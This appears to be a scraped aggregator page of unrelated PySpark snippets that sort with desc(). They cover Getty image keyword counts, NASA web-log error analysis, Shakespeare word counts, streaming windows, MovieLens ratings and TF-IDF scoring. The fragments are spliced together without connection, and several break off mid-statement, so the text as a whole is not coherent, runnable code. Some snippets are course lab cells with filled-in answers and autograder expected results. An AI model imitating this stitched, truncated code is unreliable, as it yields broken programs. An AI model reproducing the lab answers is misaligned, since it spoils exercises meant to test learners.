    F.col("inverse_time_to_next_escalation") > 0).select(
        'reference_id').distinct())
ref_ids_escalated.count()

comments_with_cutoff_times = spark_read.parquet(
    path=data_dir.make_processed_path('comments_with_cutoff_times'))

comments_with_cutoff_times.show()
comments_with_cutoff_times.groupby('comment_type').count().orderBy(
    F.desc('count')).show(n=100)

comment_types = [
    'general', 'programming', 'email', 'explanation', 'reproduction',
    'workaround', 'configuration', 'solution', 'symptom', 'problem',
    'educreferral'
]

encoded_comments_with_cutoff, one_hot_encoded_comment_columns = (
    one_hot_encode_categorical(df=comments_with_cutoff_times,
                               categorical_column='comment_type',
                               values_to_one_hot_encode=comment_types))
columns_for_label_encoding = ['comment_type', 'notes']

for col in columns_for_label_encoding:
    encoded_comments_with_cutoff = (label_encode_categorical_inplace(
Exemple #53
0
def run():
    topFolder = 'hdfs://172.16.241.100:9000/data/stuff/getty/'
    gettyImagesMetaFile = '{}allGettyMeta_1000000.csv'.format(topFolder)
    # imageId  kwIds  vcgImageId
    print(gettyImagesMetaFile)
    gettyKwIdCountFile = '{}gettyKwIdCount.csv'.format(topFolder)
    fields = [
        StructField("imageId", StringType()),
        StructField("kwIds", StringType()),
        StructField("vcgImageId", StringType())
    ]
    schema = StructType(fields)
    gettyImagesMeta_df = spark.read.format("csv").option(
        "header",
        "false").schema(schema).option("delimiter",
                                       '\t').load(gettyImagesMetaFile)
    # print('gettyImagesMeta_df: %s' % gettyImagesMeta_df.count())

    gettyImagesMeta_df = gettyImagesMeta_df.filter(
        gettyImagesMeta_df.kwIds.isNotNull()).rdd.filter(
            lambda row: row.kwIds is not None).toDF()

    # print('gettyImagesMeta_df kwIds not null count: %s' % gettyImagesMeta_df.count())

    # compute kwId count, generate kwIdsCount.csv

    def flatMap1(row):
        imageId = row.imageId
        kwIds_ = row.kwIds.split(',')
        rows = []
        for kwId in kwIds_:
            row = Row(imageId=imageId, kwId=kwId)
            rows.append(row)
        return rows

    gettyImagesMeta_df = gettyImagesMeta_df.rdd.filter(
        lambda row: ((row.kwIds is not None))).flatMap(
            lambda row: flatMap1(row)).toDF().cache()
    gettyImagesMeta_df.show(100, False)
    # print('total imageId-kwId count:%d' % gettyImagesMeta_df.count())

    gettyKwIdCount_df = gettyImagesMeta_df.groupBy("kwId").agg({
        '*': 'count'
    }).withColumnRenamed('count(1)', 'count')

    gettyKwIdCount_df = gettyKwIdCount_df.orderBy(desc("count"))
    gettyKwIdCount_df.show(100, False)

    gettyKwIdCount_df.repartition(1).write.format(
        "com.databricks.spark.csv").option("header", "True").option(
            "delimiter", '\t').mode("overwrite").save(gettyKwIdCountFile)

    # analysis kwIdsCount.csv  then sort by count desc  select count > topNum kwIds as labels generate related files
    topNum = 300
    gettyKwIdCountFilteredFile = '{}gettyKwIdCountAbove{}.csv'.format(
        topFolder, 300)
    labelsIndexMappingFile = '{}labelsIndexMappingAbove{}.csv'.format(
        topFolder, 300)

    gettyKwIdCount_df = spark.read.format("csv").option(
        "header", "true").option("delimiter", '\t').load(gettyKwIdCountFile)
    gettyKwIdCount_df.show(10, False)

    gettyKwIdCount_df = gettyKwIdCount_df.filter(
        gettyKwIdCount_df['count'] > topNum)

    gettyKwIdCount_df = gettyKwIdCount_df.withColumn(
        "index",
        F.row_number().over(Window.orderBy(monotonically_increasing_id())) - 1)
    gettyKwIdCount_df.show(100, False)
    gettyKwIdCount_df.repartition(1).write.format(
        "com.databricks.spark.csv").option("header", "True").option(
            "delimiter",
            '\t').mode("overwrite").save(gettyKwIdCountFilteredFile)

    gettyKwIdCount_df.select('index', 'kwId').repartition(1).write.format("com.databricks.spark.csv").option("header",
                                                                                                             "False") \
        .option("delimiter", '\t').mode("overwrite").save(
        labelsIndexMappingFile)
    kwIdsSet = set()

    kwIds = gettyKwIdCount_df.select('index', 'kwId').rdd.collect()
    for row in kwIds:
        kwIdsSet.add(row.kwId)
    print('filterd kwIds size: %d' % len(kwIdsSet))

    kwIdsSet_broadcast = spark.sparkContext.broadcast(kwIdsSet)

    gettytopNumImagesOfKwIdFile = '{}kwsTopNumImages.csv'.format(topFolder)
    # kwId,topNumImages

    finalImageKwIdsFile = '{}finalImageKwIds.csv'.format(topFolder)
    gettytopNumImagesOfKwId_df = spark.read.format("csv").option(
        "header", "false").option(
            "delimiter",
            '\t').load(gettytopNumImagesOfKwIdFile).withColumnRenamed(
                '_c0', 'kwId').withColumnRenamed('_c1', 'imageIds')
    gettytopNumImagesOfKwId_df = gettytopNumImagesOfKwId_df.filter(
        gettytopNumImagesOfKwId_df.imageIds.isNotNull())

    def filterKwIds(row):
        kwId = row.kwId
        if kwId in kwIdsSet_broadcast.value:
            return True
        else:
            return False

    def flatMaps(row):
        kwId = row.kwId
        imageIds = row.imageIds.split(',')
        rows = []
        for imageId in imageIds:
            row = Row(kwId=kwId, imageId=imageId)
            rows.append(row)
        return rows

    gettytopNumImagesOfKwId_df = gettytopNumImagesOfKwId_df.rdd.filter(
        lambda row: filterKwIds(row)).flatMap(
            lambda row: flatMaps(row)).toDF()

    gettytopNumImagesOfKwId_df = gettytopNumImagesOfKwId_df.groupBy(
        "imageId").agg({
            '*': 'count'
        }).withColumnRenamed('count(1)', 'count').drop('count')
    gettyImagesMeta_df = gettyImagesMeta_df.withColumnRenamed(
        'imageId', 'gettyImageId')
    # gettyImagesMeta_df 过滤 然后合并imageId-kwId to imageId-kwIds (aggregate operation)
    zero_value_2 = None

    def seqFunc_2(accumulator, element):
        if accumulator is None:
            return element
        else:
            element = accumulator + "," + element
            return element

    def combFunc_2(accumulator1, accumulator2):
        if accumulator1 is None:
            return accumulator2
        else:
            accumulator2 = accumulator1 + "," + accumulator2
            return accumulator2

    gettyImagesMeta_df = gettyImagesMeta_df.rdd.filter(lambda row: filterKwIds(
        row)).map(lambda row: (row.gettyImageId, row.kwId)).aggregateByKey(
            zero_value_2, seqFunc_2, combFunc_2).toDF().withColumnRenamed(
                '_2', 'kwIds').withColumnRenamed('_1', 'gettyImageId')
    gettyImagesMeta_df.show(100, False)

    finalImageKwIds_df = gettytopNumImagesOfKwId_df.join(
        gettyImagesMeta_df,
        gettyImagesMeta_df.gettyImageId == gettytopNumImagesOfKwId_df.imageId,
        how='inner').drop('imageId')
    # add new column url
    gettyImageUrlPrefix = 'https://elephant-data-backup.oss-cn-beijing.aliyuncs.com/elephant-data-backup/gettyimage/'

    def setUrl(gettyImageId):

        return '{}{}.jpg'.format(gettyImageUrlPrefix, gettyImageId)

    setUrlUdf = udf(setUrl, StringType())
    finalImageKwIds_df = finalImageKwIds_df.withColumn(
        'url', setUrlUdf('gettyImageId'))

    finalImageKwIds_df.repartition(1).write.format(
        "com.databricks.spark.csv").option("header", "True").option(
            "delimiter", '\t').mode("overwrite").save(finalImageKwIdsFile)
 (u'/history/apollo/a-001/a-001-patch-small.gif', 97),
 (u'/images/Nasa-logo.gif', 85),
 (u'', 76),
 (u'/shuttle/resources/orbiters/atlantis.gif', 63),
 (u'/history/apollo/images/little-joe.jpg', 62),
 (u'/images/lf-logo.gif', 59),
 (u'/shuttle/resources/orbiters/discovery.gif', 56),
 (u'/shuttle/resources/orbiters/challenger.gif', 54),
 (u'/robots.txt', 53),
 (u'/history/apollo/pad-abort-test-2/pad-abort-test-2-patch-small.gif', 38)
]
Test.assertEquals(top_20_not_found, top_20_expected, 'incorrect top_20_not_found')

# (5d) Exercise: Listing the Top Twenty-five 404 Response Code Hosts

hosts_404_count_df = not_found_df.groupBy('host').count().sort(desc('count'))

print 'Top 25 hosts that generated errors:\n'
hosts_404_count_df.show(n=25, truncate=False)


top_25_404 = [(row[0], row[1]) for row in hosts_404_count_df.take(25)]
Test.assertEquals(len(top_25_404), 25, 'length of errHostsTop25 is not 25')

expected = set([
  (u'maz3.maz.net ', 39),
  (u'piweba3y.prodigy.com ', 39),
  (u'gate.barr.com ', 38),
  (u'nexus.mlckew.edu.au ', 37),
  (u'ts8-1.westwood.ts.ucla.edu ', 37),
  (u'm38-370-9.mit.edu ', 37),
Test.assertEquals(shakeWordsDF.columns, ['word'], "shakeWordsDF should only contain the Column 'word'")

# COMMAND ----------

# MAGIC %md
# MAGIC ** (4e) Count the words **
# MAGIC 
# MAGIC We now have a DataFrame that is only words.  Next, let's apply the `wordCount()` function to produce a list of word counts. We can view the first 20 words by using the `show()` action; however, we'd like to see the words in descending order of count, so we'll need to apply the [`orderBy` DataFrame method](http://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.DataFrame.orderBy) to first sort the DataFrame that is returned from `wordCount()`.
# MAGIC 
# MAGIC You'll notice that many of the words are common English words. These are called stopwords. In a later lab, we will see how to eliminate them from the results.

# COMMAND ----------

# TODO: Replace <FILL IN> with appropriate code
from pyspark.sql.functions import desc
topWordsAndCountsDF = wordCount(shakeWordsDF).orderBy(desc("count"),"word")
topWordsAndCountsDF.show()

# COMMAND ----------

# TEST Count the words (4e)
Test.assertEquals(topWordsAndCountsDF.take(15),
                  [(u'the', 27361), (u'and', 26028), (u'i', 20681), (u'to', 19150), (u'of', 17463),
                   (u'a', 14593), (u'you', 13615), (u'my', 12481), (u'in', 10956), (u'that', 10890),
                   (u'is', 9134), (u'not', 8497), (u'with', 7771), (u'me', 7769), (u'it', 7678)],
                  'incorrect value for top15WordsAndCountsDF')

# COMMAND ----------

# MAGIC %md
# MAGIC #### ** Prepare to the course autograder **
Exemple #56
0
                    .withColumn('rate', split(events['value'],',')[5].cast(FloatType()) )           \
                    .withColumn('action', split(events['value'],',')[6].cast(StringType()) )

#parsed_events.show(10,False)

###################################################################################################
# Displaying user count. 60 second window with 15 sec sliding duration...
###################################################################################################

# http://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.functions.window
# pyspark.sql.functions.window(timeColumn, windowDuration, slideDuration=None, startTime=None)
windowedCounts = parsed_events.groupBy(
    window(parsed_events.datetime, "1 minutes", "15 seconds"),
    parsed_events.user) \
    .count()            \
    .sort(desc("count"))

query1 = windowedCounts \
    .writeStream \
    .outputMode("complete") \
    .format("console") \
    .start()

###################################################################################################
# Displaying average duration by user. 60 second window with 15 sec sliding duration...
###################################################################################################

windowedAvg = parsed_events.groupBy(
    window(parsed_events.datetime, "1 minutes", "15 seconds"),
    parsed_events.user) \
    .agg({'duration': 'mean'}) \
not200DF = logs_df.<FILL IN>
not200DF.show(10)
# Sorted DataFrame containing all endpoints and the number of times they were accessed with non-200 return code
logs_sum_df = not200DF.<FILL IN>

print 'Top Ten failed URLs:'
logs_sum_df.show(10, False)

# COMMAND ----------

# ANSWER
from pyspark.sql.functions import desc
not200DF = logs_df.filter(logs_df['status'] != 200)
not200DF.show(10)
# Sorted DataFrame containing all endpoints and the number of times they were accessed with non-200 return code
logs_sum_df = not200DF.groupBy('path').count().orderBy(desc('count'))

print 'Top Ten failed URLs:'
logs_sum_df.show(10, False)

# COMMAND ----------

# TEST Top ten error endpoints (4a)
top_10_err_urls = [(row[0], row[1]) for row in logs_sum_df.take(10)]
top_10_err_expected = [
  (u'/images/NASA-logosmall.gif', 8761),
  (u'/images/KSC-logosmall.gif', 7236),
  (u'/images/MOSAIC-logosmall.gif', 5197),
  (u'/images/USA-logosmall.gif', 5157),
  (u'/images/WORLD-logosmall.gif', 5020),
  (u'/images/ksclogo-medium.gif', 4728),
from pyspark.sql import SparkSession
from pyspark.sql import functions as F
from pyspark.sql.types import StructType, StructField, IntegerType, LongType

# Spark v3.0.1
spark = SparkSession.builder.master("local").appName(
    "PopularMovie").getOrCreate()
spark.sparkContext.setLogLevel("ERROR")

schema = StructType([
    StructField("userID", IntegerType(), True),
    StructField("movieID", IntegerType(), True),
    StructField("rating", IntegerType(), True),
    StructField("timestamp", LongType(), True),
])

moviesDF = spark.read.option("sep",
                             "\t").schema(schema).csv("./ml-100k/u.data")
topMovieIDs = moviesDF.groupBy("movieID").count().orderBy(F.desc("count"))
topMovieIDs.sort("movieID").show(10)

spark.stop()
        print("Usage: pretty-cluster.py <metadata> <input> <output> [<query>]", file=sys.stderr)
        exit(-1)
    sc = SparkContext(appName="Prettyprint Clusters")
    sqlContext = SQLContext(sc)

    outpath = sys.argv[3]
    (outputFormat, outputOptions) = guessFormat(outpath, "json")

    ## Should do more field renaming in meta to avoid clashing with fields in raw.
    meta = sqlContext.read.json(sys.argv[1])\
           .dropDuplicates(['series'])
    
    constructURL = udf(lambda url, corpus, id, regions: formatURL(url, corpus, id, regions))

    df = sqlContext.read.load(sys.argv[2]) \
        .withColumnRenamed('title', 'doc_title')\
        .withColumnRenamed('lang', 'doc_lang')\
        .withColumn('url', constructURL(col('page_access'), col('corpus'), col('id'), col('regions')))\
        .drop('locs').drop('pages').drop('regions')\
        .join(meta, 'series', 'left_outer')

    filtered = df.join(df.filter(sys.argv[4]).select('cluster').distinct(), 'cluster') \
               if len(sys.argv) >= 5 else df

    filtered.withColumn('lang', concat_ws(',', col('lang'))) \
            .orderBy(desc('size'), 'cluster', 'date', 'id', 'begin')\
            .write.format(outputFormat).options(**outputOptions).save(outpath)

    sc.stop()
    
Exemple #60
0
spark = SparkSession(sc)

rawData = sc.textFile("../data/subset-small.tsv")
fields = rawData.map(lambda x: x.split("\t"))
documents = fields.map(lambda x: x[3].split(" "))

documentNames = fields.map(lambda x: x[1])

hashingTF = HashingTF(100000)
tf = hashingTF.transform(documents)

tf.cache()
idf = IDF(minDocFreq=2).fit(tf)
tfidf = idf.transform(tf)

gettysburgTF = hashingTF.transform(['Gettysburg'])
gettysburgHashValue = int(gettysburgTF.indices[0])

gettsburgRelevance = tfidf.map(lambda x: float(x[gettysburgHashValue]))

zippedResults = gettsburgRelevance.zip(documentNames)

schema = StructType([StructField("score", FloatType(), True), StructField("document", StringType(), True)])

resultSchema = spark.createDataFrame(zippedResults, schema)
resultSchema.createOrReplaceTempView('Results')

print("Result: ")
print(resultSchema.sort(desc('score')).show())